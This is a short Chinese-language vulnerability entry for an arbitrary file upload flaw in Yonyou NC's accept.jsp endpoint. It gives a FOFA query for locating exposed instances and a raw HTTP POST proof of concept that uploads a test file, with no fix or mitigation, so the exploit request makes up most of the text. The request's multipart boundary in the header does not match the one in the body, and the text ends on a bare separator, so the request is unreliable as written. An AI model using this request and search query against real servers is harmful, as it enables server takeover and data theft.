漏洞描述
用友NC accept.jsp处存在任意文件上传漏洞,攻击者通过漏洞可以获取网站权限,导致服务器失陷。
漏洞复现
fofa语法:app=”用友-UFIDA-NC”
POC
POST /aim/equipmap/accept.jsp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Host:
Content-Type: multipart/form-data; boundary=---------------------------16314487820932200903769468567
Content-Length: 206
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
Connection: close
----------170237501
Content-Disposition: form-data; name="file";filename="ok.txt"
1234
----